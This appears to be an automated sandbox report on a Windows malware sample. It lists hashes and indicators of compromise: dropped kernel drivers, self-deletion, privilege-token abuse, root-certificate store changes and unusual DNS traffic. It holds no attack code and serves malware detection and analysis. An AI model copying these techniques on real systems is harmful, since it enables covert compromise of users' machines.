Analysis
-
max time kernel
150s -
max time network
149s -
platform
windows7_x64 -
resource
win7-20231020-en -
resource tags
arch:x64arch:x86image:win7-20231020-enlocale:en-usos:windows7-x64system -
submitted
16/11/2023, 12:03 UTC
Static task
static1
Behavioral task
behavioral1
Sample
aadb797f5510dd51561246d61a1e5e1a6157590a248c7f4a8aac374ab0ac2d00.exe
Resource
win7-20231020-en
General
-
Target
aadb797f5510dd51561246d61a1e5e1a6157590a248c7f4a8aac374ab0ac2d00.exe
-
Size
2.0MB
-
MD5
2f3353e9de4535e858254b2f9ebe0e70
-
SHA1
beb0fe2c7a977abf0f292477466be291fca80a9a
-
SHA256
aadb797f5510dd51561246d61a1e5e1a6157590a248c7f4a8aac374ab0ac2d00
-
SHA512
909bb4cd1108fefed5bdf68af29eb0fbc5584f6c9ce7b7a15790af2c24ac2898ab132e7e95b7ba636c131c645e8aee95ef749dc24f7f05c2eb3808ab6c2146d7
-
SSDEEP
49152:8Us4vWvQznXPwh11sXIAyT9tN93ul/lDxqqqoqqqdT:ls4iKXPs1sByTNT
Malware Config
Signatures
-
Suspicious use of NtCreateUserProcessOtherParentProcess 2 IoCs
description pid Process procid_target PID 1304 created 420 1304 Explorer.EXE 2 PID 1304 created 420 1304 Explorer.EXE 2 -
Downloads MZ/PE file
-
Drops file in Drivers directory 3 IoCs
description ioc Process File created C:\Windows\System32\drivers\HMbLwp.sys charmap.exe File opened for modification C:\Windows\system32\drivers\JmhoT2djjF.sys charmap.exe File opened for modification C:\Windows\system32\drivers\8P6gFQ8gor2.moj charmap.exe -
Deletes itself 1 IoCs
pid Process 692 cmd.exe -
Executes dropped EXE 2 IoCs
pid Process 2688 autofmt.exe 2788 charmap.exe -
resource yara_rule behavioral1/files/0x0006000000015e3e-129.dat upx -
Unexpected DNS network traffic destination 1 IoCs
Network traffic to other servers than the configured DNS servers was detected on the DNS port.
description ioc Destination IP 114.114.114.114 -
Drops file in System32 directory 13 IoCs
description ioc Process File opened for modification C:\Windows\system32\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content\3FE2BD01AB6BC312BF0DADE7F797388F_896832C6BC857CFAEA9E59E166B13E2C charmap.exe File opened for modification C:\Windows\system32\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content\0DA515F703BB9B49479E8697ADB0B955_4136D3715888E22D65EBE484B233D81B charmap.exe File opened for modification C:\Windows\system32\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\349D186F1CB5682FA0194D4F3754EF36_CE21678B3713ACF5F5ED4AAA700C6173 charmap.exe File opened for modification C:\Windows\system32\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\3FE2BD01AB6BC312BF0DADE7F797388F_896832C6BC857CFAEA9E59E166B13E2C charmap.exe File opened for modification C:\Windows\system32\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\0766DB9AB186806BB9A6B6802D3BA734 charmap.exe File opened for modification C:\Windows\system32\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\B039FEA45CB4CC4BBACFC013C7C55604_50D7940D5D3FEDD8634D83074C7A46A3 charmap.exe File created C:\Windows\system32\ \Windows\System32\vFPZHNBo.sys charmap.exe File opened for modification C:\Windows\system32\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\0DA515F703BB9B49479E8697ADB0B955_4136D3715888E22D65EBE484B233D81B charmap.exe File opened for modification C:\Windows\system32\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content\0766DB9AB186806BB9A6B6802D3BA734 charmap.exe File opened for modification C:\Windows\system32\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\AD5F118F7897046E8CA970AE6A6AB70B_ADB601E2C381343DA1163E5F08582475 charmap.exe File opened for modification C:\Windows\system32\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content\AD5F118F7897046E8CA970AE6A6AB70B_ADB601E2C381343DA1163E5F08582475 charmap.exe File opened for modification C:\Windows\system32\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content\349D186F1CB5682FA0194D4F3754EF36_CE21678B3713ACF5F5ED4AAA700C6173 charmap.exe File opened for modification C:\Windows\system32\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content\B039FEA45CB4CC4BBACFC013C7C55604_50D7940D5D3FEDD8634D83074C7A46A3 charmap.exe -
Drops file in Windows directory 1 IoCs
description ioc Process File created C:\Windows\NnQoZGsXT.sys charmap.exe -
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s).
-
Delays execution with timeout.exe 1 IoCs
pid Process 2880 timeout.exe -
Modifies data under HKEY_USERS 64 IoCs
description ioc Process Set value (str) \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\5.0\Cache\Cookies\CachePrefix = "Cookie:" charmap.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\CA\CTLs charmap.exe Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\trust charmap.exe Set value (int) \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\AutoDetect = "1" charmap.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Wpad charmap.exe Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\CA\CTLs charmap.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\SmartCardRoot charmap.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\SmartCardRoot\CRLs charmap.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Wpad\{23F489A8-FB5E-4A72-8A9D-B1BFD15D50DE} charmap.exe Set value (str) \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Wpad\{23F489A8-FB5E-4A72-8A9D-B1BFD15D50DE}\WpadNetworkName = "Network 2" charmap.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Disallowed\CTLs charmap.exe Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\Disallowed\Certificates charmap.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Root\CRLs charmap.exe Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\TrustedPeople\CTLs charmap.exe Key created \REGISTRY\USER\.DEFAULT\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings charmap.exe Set value (data) \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Connections\DefaultConnectionSettings = 4600000002000000090000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000 charmap.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Wpad\e2-a4-fb-8f-af-0c charmap.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\TrustedPeople charmap.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\TrustedPeople\Certificates charmap.exe Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\trust\CRLs charmap.exe Set value (int) \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ProxyEnable = "0" charmap.exe Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\TrustedPeople\Certificates charmap.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\trust\Certificates charmap.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Connections charmap.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Disallowed\Certificates charmap.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Root\Certificates charmap.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\SmartCardRoot\CTLs charmap.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings charmap.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\ charmap.exe Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\CA\CRLs charmap.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\SmartCardRoot\Certificates charmap.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\TrustedPeople\CRLs charmap.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\TrustedPeople\CTLs charmap.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Disallowed charmap.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Disallowed\CRLs charmap.exe Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\trust\Certificates charmap.exe Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\Disallowed charmap.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Root\CTLs charmap.exe Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\trust\CTLs charmap.exe Set value (data) \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Connections\DefaultConnectionSettings = 4600000003000000090000000000000000000000000000000400000000000000000000000000000000000000000000000000000001000000020000000a7f0079000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000 charmap.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Wpad\{23F489A8-FB5E-4A72-8A9D-B1BFD15D50DE}\e2-a4-fb-8f-af-0c charmap.exe Set value (int) \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Wpad\e2-a4-fb-8f-af-0c\WpadDecisionReason = "1" charmap.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\trust\CTLs charmap.exe Set value (data) \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\2D\52C64B7E\LanguageList = 65006e002d0055005300000065006e0000000000 charmap.exe Set value (data) \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Wpad\e2-a4-fb-8f-af-0c\WpadDecisionTime = a0054ee88418da01 charmap.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\My charmap.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\CA\Certificates charmap.exe Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\CA charmap.exe Set value (str) \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\5.0\Cache\Content\CachePrefix charmap.exe Set value (int) \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Wpad\{23F489A8-FB5E-4A72-8A9D-B1BFD15D50DE}\WpadDecision = "0" charmap.exe Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\CA\Certificates charmap.exe Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\Disallowed\CTLs charmap.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\trust charmap.exe Set value (str) \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\5.0\Cache\History\CachePrefix = "Visited:" charmap.exe Set value (data) \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Connections\SavedLegacySettings = 4600000002000000090000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000 charmap.exe Set value (int) \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\UNCAsIntranet = "0" charmap.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\CA\CRLs charmap.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Root charmap.exe Set value (int) \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Wpad\{23F489A8-FB5E-4A72-8A9D-B1BFD15D50DE}\WpadDecisionReason = "1" charmap.exe Set value (int) \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Wpad\e2-a4-fb-8f-af-0c\WpadDecision = "0" charmap.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\CA charmap.exe Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\TrustedPeople\CRLs charmap.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\WinTrust\Trust Providers\Software Publishing charmap.exe Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\Disallowed\CRLs charmap.exe -
description ioc Process Set value (data) \REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\D1EB23A46D17D68FD92564C2F1F1601764D8E349\Blob = 1900000001000000100000002aa1c05e2ae606f198c2c5e937c97aa20f00000001000000140000003e8e6487f8fd27d322a269a71edaac5d57811286090000000100000034000000303206082b0601050507030106082b0601050507030206082b0601050507030406082b0601050507030306082b0601050507030853000000010000002600000030243022060c2b06010401b231010201050130123010060a2b0601040182373c0101030200c00b00000001000000180000004300b7004f00b7004d00b7004f00b7004400b7004f000000140000000100000014000000a0110a233e96f107ece2af29ef82a57fd030a4b41d00000001000000100000002e0d6875874a44c820912e85e964cfdb030000000100000014000000d1eb23a46d17d68fd92564c2f1f1601764d8e349040000000100000010000000497904b0eb8719ac47b0bc11519b74d0200000000100000036040000308204323082031aa003020102020101300d06092a864886f70d0101050500307b310b3009060355040613024742311b301906035504080c1247726561746572204d616e636865737465723110300e06035504070c0753616c666f7264311a3018060355040a0c11436f6d6f646f204341204c696d697465643121301f06035504030c18414141204365727469666963617465205365727669636573301e170d3034303130313030303030305a170d3238313233313233353935395a307b310b3009060355040613024742311b301906035504080c1247726561746572204d616e636865737465723110300e06035504070c0753616c666f7264311a3018060355040a0c11436f6d6f646f204341204c696d697465643121301f06035504030c1841414120436572746966696361746520536572766963657330820122300d06092a864886f70d01010105000382010f003082010a0282010100be409df46ee1ea76871c4d45448ebe46c883069dc12afe181f8ee402faf3ab5d508a16310b9a06d0c57022cd492d5463ccb66e68460b53eacb4c24c0bc724eeaf115aef4549a120ac37ab23360e2da8955f32258f3dedccfef8386a28c944f9f68f29890468427c776bfe3cc352c8b5e07646582c048b0a891f9619f762050a891c766b5eb78620356f08a1a13ea31a31ea099fd38f6f62732586f07f56bb8fb142bafb7aaccd6635f738cda0599a838a8cb17783651ace99ef4783a8dcf0fd942e2980cab2f9f0e01deef9f9949f12ddfac744d1b98b547c5e529d1f99018c7629cbe83c7267b3e8a25c7c0dd9de6356810209d8fd8ded2c3849c0d5ee82fc90203010001a381c03081bd301d0603551d0e04160414a0110a233e96f107ece2af29ef82a57fd030a4b4300e0603551d0f0101ff040403020106300f0603551d130101ff040530030101ff307b0603551d1f047430723038a036a0348632687474703a2f2f63726c2e636f6d6f646f63612e636f6d2f414141436572746966696361746553657276696365732e63726c3036a034a0328630687474703a2f2f63726c2e636f6d6f646f2e6e65742f414141436572746966696361746553657276696365732e63726c300d06092a864886f70d010105050003820101000856fc02f09be8ffa4fad67bc64480ce4fc4c5f60058cca6b6bc1449680476e8e6ee5dec020f60d68d50184f264e01e3e6b0a5eebfbc745441bffdfc12b8c74f5af48960057f60b7054af3f6f1c2bfc4b97486b62d7d6bccd2f346dd2fc6e06ac3c334032c7d96dd5ac20ea70a99c1058bab0c2ff35c3acf6c37550987de53406c58effcb6ab656e04f61bdc3ce05a15c69ed9f15948302165036cece92173ec9b03a1e037ada015188ffaba02cea72ca910132cd4e50826ab229760f8905e74d4a29a53bdf2a968e0a26ec2d76cb1a30f9ebfeb68e756f2aef2e32b383a0981b56b85d7be2ded3f1ab7b263e2f5622c82d46a004150f139839f95e93696986e aadb797f5510dd51561246d61a1e5e1a6157590a248c7f4a8aac374ab0ac2d00.exe Key created \REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\A8985D3A65E5E5C4B2D7D66D40C6DD2FB19C5436 charmap.exe Set value (data) \REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\A8985D3A65E5E5C4B2D7D66D40C6DD2FB19C5436\Blob = 04000000010000001000000079e4a9840d7d3a96d7c04fe2434c892e0f0000000100000014000000b34ddd372ed92e8f2abfbb9e20a9d31f204f194b090000000100000034000000303206082b0601050507030106082b0601050507030206082b0601050507030406082b0601050507030306082b0601050507030814000000010000001400000003de503556d14cbb66f0a3e21b1bc397b23dd1550b00000001000000120000004400690067006900430065007200740000001d000000010000001000000059779e39e21a2e3dfced6857ed5c5fd9030000000100000014000000a8985d3a65e5e5c4b2d7d66d40c6dd2fb19c54361900000001000000100000000f3a0527d242de2dc98e5cfcb1e991ee2000000001000000b3030000308203af30820297a0030201020210083be056904246b1a1756ac95991c74a300d06092a864886f70d01010505003061310b300906035504061302555331153013060355040a130c446967694365727420496e6331193017060355040b13107777772e64696769636572742e636f6d3120301e06035504031317446967694365727420476c6f62616c20526f6f74204341301e170d3036313131303030303030305a170d3331313131303030303030305a3061310b300906035504061302555331153013060355040a130c446967694365727420496e6331193017060355040b13107777772e64696769636572742e636f6d3120301e06035504031317446967694365727420476c6f62616c20526f6f7420434130820122300d06092a864886f70d01010105000382010f003082010a0282010100e23be11172dea8a4d3a357aa50a28f0b7790c9a2a5ee12ce965b010920cc0193a74e30b753f743c46900579de28d22dd870640008109cece1b83bfdfcd3b7146e2d666c705b37627168f7b9e1e957deeb748a308dad6af7a0c3906657f4a5d1fbc17f8abbeee28d7747f7a78995985686e5c23324bbf4ec0e85a6de370bf7710bffc01f685d9a844105832a97518d5d1a2be47e2276af49a33f84908608bd45fb43a84bfa1aa4a4c7d3ecf4f5f6c765ea04b37919edc22e66dce141a8e6acbfecdb3146417c75b299e32bff2eefad30b42d4abb74132da0cd4eff881d5bb8d583fb51be84928a270da3104ddf7b216f24c0a4e07a8ed4a3d5eb57fa390c3af270203010001a3633061300e0603551d0f0101ff040403020186300f0603551d130101ff040530030101ff301d0603551d0e0416041403de503556d14cbb66f0a3e21b1bc397b23dd155301f0603551d2304183016801403de503556d14cbb66f0a3e21b1bc397b23dd155300d06092a864886f70d01010505000382010100cb9c37aa4813120afadd449c4f52b0f4dfae04f5797908a32418fc4b2b84c02db9d5c7fef4c11f58cbb86d9c7a74e79829ab11b5e370a0a1cd4c8899938c9170e2ab0f1cbe93a9ff63d5e40760d3a3bf9d5b09f1d58ee353f48e63fa3fa7dbb466df6266d6d16e418df22db5ea774a9f9d58e22b59c04023ed2d2882453e7954922698e08048a837eff0d6796016deace80ecd6eac4417382f49dae1453e2ab93653cf3a5006f72ee8c457496c612118d504ad783c2c3a806ba7ebaf1514e9d889c1b9386ce2916c8aff64b977255730c01b24a3e1dce9df477cb5b424080530ec2dbd0bbf45bf50b9a9f3eb980112adc888c698345f8d0a3cc6e9d595956dde charmap.exe Key created \REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\D1EB23A46D17D68FD92564C2F1F1601764D8E349 aadb797f5510dd51561246d61a1e5e1a6157590a248c7f4a8aac374ab0ac2d00.exe Set value (data) \REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\D1EB23A46D17D68FD92564C2F1F1601764D8E349\Blob = 0f00000001000000140000003e8e6487f8fd27d322a269a71edaac5d57811286090000000100000034000000303206082b0601050507030106082b0601050507030206082b0601050507030406082b0601050507030306082b0601050507030853000000010000002600000030243022060c2b06010401b231010201050130123010060a2b0601040182373c0101030200c00b00000001000000180000004300b7004f00b7004d00b7004f00b7004400b7004f000000140000000100000014000000a0110a233e96f107ece2af29ef82a57fd030a4b41d00000001000000100000002e0d6875874a44c820912e85e964cfdb030000000100000014000000d1eb23a46d17d68fd92564c2f1f1601764d8e349200000000100000036040000308204323082031aa003020102020101300d06092a864886f70d0101050500307b310b3009060355040613024742311b301906035504080c1247726561746572204d616e636865737465723110300e06035504070c0753616c666f7264311a3018060355040a0c11436f6d6f646f204341204c696d697465643121301f06035504030c18414141204365727469666963617465205365727669636573301e170d3034303130313030303030305a170d3238313233313233353935395a307b310b3009060355040613024742311b301906035504080c1247726561746572204d616e636865737465723110300e06035504070c0753616c666f7264311a3018060355040a0c11436f6d6f646f204341204c696d697465643121301f06035504030c1841414120436572746966696361746520536572766963657330820122300d06092a864886f70d01010105000382010f003082010a0282010100be409df46ee1ea76871c4d45448ebe46c883069dc12afe181f8ee402faf3ab5d508a16310b9a06d0c57022cd492d5463ccb66e68460b53eacb4c24c0bc724eeaf115aef4549a120ac37ab23360e2da8955f32258f3dedccfef8386a28c944f9f68f29890468427c776bfe3cc352c8b5e07646582c048b0a891f9619f762050a891c766b5eb78620356f08a1a13ea31a31ea099fd38f6f62732586f07f56bb8fb142bafb7aaccd6635f738cda0599a838a8cb17783651ace99ef4783a8dcf0fd942e2980cab2f9f0e01deef9f9949f12ddfac744d1b98b547c5e529d1f99018c7629cbe83c7267b3e8a25c7c0dd9de6356810209d8fd8ded2c3849c0d5ee82fc90203010001a381c03081bd301d0603551d0e04160414a0110a233e96f107ece2af29ef82a57fd030a4b4300e0603551d0f0101ff040403020106300f0603551d130101ff040530030101ff307b0603551d1f047430723038a036a0348632687474703a2f2f63726c2e636f6d6f646f63612e636f6d2f414141436572746966696361746553657276696365732e63726c3036a034a0328630687474703a2f2f63726c2e636f6d6f646f2e6e65742f414141436572746966696361746553657276696365732e63726c300d06092a864886f70d010105050003820101000856fc02f09be8ffa4fad67bc64480ce4fc4c5f60058cca6b6bc1449680476e8e6ee5dec020f60d68d50184f264e01e3e6b0a5eebfbc745441bffdfc12b8c74f5af48960057f60b7054af3f6f1c2bfc4b97486b62d7d6bccd2f346dd2fc6e06ac3c334032c7d96dd5ac20ea70a99c1058bab0c2ff35c3acf6c37550987de53406c58effcb6ab656e04f61bdc3ce05a15c69ed9f15948302165036cece92173ec9b03a1e037ada015188ffaba02cea72ca910132cd4e50826ab229760f8905e74d4a29a53bdf2a968e0a26ec2d76cb1a30f9ebfeb68e756f2aef2e32b383a0981b56b85d7be2ded3f1ab7b263e2f5622c82d46a004150f139839f95e93696986e aadb797f5510dd51561246d61a1e5e1a6157590a248c7f4a8aac374ab0ac2d00.exe Set value (data) \REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\D1EB23A46D17D68FD92564C2F1F1601764D8E349\Blob = 040000000100000010000000497904b0eb8719ac47b0bc11519b74d0030000000100000014000000d1eb23a46d17d68fd92564c2f1f1601764d8e3491d00000001000000100000002e0d6875874a44c820912e85e964cfdb140000000100000014000000a0110a233e96f107ece2af29ef82a57fd030a4b40b00000001000000180000004300b7004f00b7004d00b7004f00b7004400b7004f00000053000000010000002600000030243022060c2b06010401b231010201050130123010060a2b0601040182373c0101030200c0090000000100000034000000303206082b0601050507030106082b0601050507030206082b0601050507030406082b0601050507030306082b060105050703080f00000001000000140000003e8e6487f8fd27d322a269a71edaac5d57811286200000000100000036040000308204323082031aa003020102020101300d06092a864886f70d0101050500307b310b3009060355040613024742311b301906035504080c1247726561746572204d616e636865737465723110300e06035504070c0753616c666f7264311a3018060355040a0c11436f6d6f646f204341204c696d697465643121301f06035504030c18414141204365727469666963617465205365727669636573301e170d3034303130313030303030305a170d3238313233313233353935395a307b310b3009060355040613024742311b301906035504080c1247726561746572204d616e636865737465723110300e06035504070c0753616c666f7264311a3018060355040a0c11436f6d6f646f204341204c696d697465643121301f06035504030c1841414120436572746966696361746520536572766963657330820122300d06092a864886f70d01010105000382010f003082010a0282010100be409df46ee1ea76871c4d45448ebe46c883069dc12afe181f8ee402faf3ab5d508a16310b9a06d0c57022cd492d5463ccb66e68460b53eacb4c24c0bc724eeaf115aef4549a120ac37ab23360e2da8955f32258f3dedccfef8386a28c944f9f68f29890468427c776bfe3cc352c8b5e07646582c048b0a891f9619f762050a891c766b5eb78620356f08a1a13ea31a31ea099fd38f6f62732586f07f56bb8fb142bafb7aaccd6635f738cda0599a838a8cb17783651ace99ef4783a8dcf0fd942e2980cab2f9f0e01deef9f9949f12ddfac744d1b98b547c5e529d1f99018c7629cbe83c7267b3e8a25c7c0dd9de6356810209d8fd8ded2c3849c0d5ee82fc90203010001a381c03081bd301d0603551d0e04160414a0110a233e96f107ece2af29ef82a57fd030a4b4300e0603551d0f0101ff040403020106300f0603551d130101ff040530030101ff307b0603551d1f047430723038a036a0348632687474703a2f2f63726c2e636f6d6f646f63612e636f6d2f414141436572746966696361746553657276696365732e63726c3036a034a0328630687474703a2f2f63726c2e636f6d6f646f2e6e65742f414141436572746966696361746553657276696365732e63726c300d06092a864886f70d010105050003820101000856fc02f09be8ffa4fad67bc64480ce4fc4c5f60058cca6b6bc1449680476e8e6ee5dec020f60d68d50184f264e01e3e6b0a5eebfbc745441bffdfc12b8c74f5af48960057f60b7054af3f6f1c2bfc4b97486b62d7d6bccd2f346dd2fc6e06ac3c334032c7d96dd5ac20ea70a99c1058bab0c2ff35c3acf6c37550987de53406c58effcb6ab656e04f61bdc3ce05a15c69ed9f15948302165036cece92173ec9b03a1e037ada015188ffaba02cea72ca910132cd4e50826ab229760f8905e74d4a29a53bdf2a968e0a26ec2d76cb1a30f9ebfeb68e756f2aef2e32b383a0981b56b85d7be2ded3f1ab7b263e2f5622c82d46a004150f139839f95e93696986e aadb797f5510dd51561246d61a1e5e1a6157590a248c7f4a8aac374ab0ac2d00.exe -
Suspicious behavior: EnumeratesProcesses 64 IoCs
pid Process 2512 aadb797f5510dd51561246d61a1e5e1a6157590a248c7f4a8aac374ab0ac2d00.exe 2512 aadb797f5510dd51561246d61a1e5e1a6157590a248c7f4a8aac374ab0ac2d00.exe 2512 aadb797f5510dd51561246d61a1e5e1a6157590a248c7f4a8aac374ab0ac2d00.exe 2512 aadb797f5510dd51561246d61a1e5e1a6157590a248c7f4a8aac374ab0ac2d00.exe 2512 aadb797f5510dd51561246d61a1e5e1a6157590a248c7f4a8aac374ab0ac2d00.exe 1304 Explorer.EXE 1304 Explorer.EXE 1304 Explorer.EXE 1304 Explorer.EXE 1304 Explorer.EXE 1304 Explorer.EXE 2512 aadb797f5510dd51561246d61a1e5e1a6157590a248c7f4a8aac374ab0ac2d00.exe 2788 charmap.exe 2788 charmap.exe 2788 charmap.exe 2788 charmap.exe 2788 charmap.exe 2788 charmap.exe 2788 charmap.exe 2788 charmap.exe 2788 charmap.exe 2788 charmap.exe 2788 charmap.exe 2788 charmap.exe 2788 charmap.exe 2788 charmap.exe 2788 charmap.exe 2788 charmap.exe 2788 charmap.exe 2788 charmap.exe 2788 charmap.exe 2788 charmap.exe 2788 charmap.exe 2788 charmap.exe 2788 charmap.exe 2788 charmap.exe 2788 charmap.exe 2788 charmap.exe 2788 charmap.exe 2788 charmap.exe 2788 charmap.exe 2788 charmap.exe 2788 charmap.exe 2788 charmap.exe 2788 charmap.exe 2788 charmap.exe 2788 charmap.exe 2788 charmap.exe 2788 charmap.exe 2788 charmap.exe 2788 charmap.exe 2788 charmap.exe 2788 charmap.exe 2788 charmap.exe 2788 charmap.exe 2788 charmap.exe 2788 charmap.exe 2788 charmap.exe 2788 charmap.exe 2788 charmap.exe 2788 charmap.exe 2788 charmap.exe 2788 charmap.exe 2788 charmap.exe -
Suspicious behavior: GetForegroundWindowSpam 1 IoCs
pid Process 1304 Explorer.EXE -
Suspicious behavior: LoadsDriver 5 IoCs
pid Process 464 Process not Found 464 Process not Found 464 Process not Found 464 Process not Found 464 Process not Found -
Suspicious use of AdjustPrivilegeToken 12 IoCs
description pid Process Token: SeDebugPrivilege 2512 aadb797f5510dd51561246d61a1e5e1a6157590a248c7f4a8aac374ab0ac2d00.exe Token: SeTcbPrivilege 2512 aadb797f5510dd51561246d61a1e5e1a6157590a248c7f4a8aac374ab0ac2d00.exe Token: SeDebugPrivilege 2512 aadb797f5510dd51561246d61a1e5e1a6157590a248c7f4a8aac374ab0ac2d00.exe Token: SeDebugPrivilege 1304 Explorer.EXE Token: SeDebugPrivilege 1304 Explorer.EXE Token: SeDebugPrivilege 2512 aadb797f5510dd51561246d61a1e5e1a6157590a248c7f4a8aac374ab0ac2d00.exe Token: SeDebugPrivilege 2788 charmap.exe Token: SeDebugPrivilege 2788 charmap.exe Token: SeDebugPrivilege 2788 charmap.exe Token: SeIncBasePriorityPrivilege 2512 aadb797f5510dd51561246d61a1e5e1a6157590a248c7f4a8aac374ab0ac2d00.exe Token: SeDebugPrivilege 2788 charmap.exe Token: SeBackupPrivilege 2788 charmap.exe -
Suspicious use of WriteProcessMemory 30 IoCs
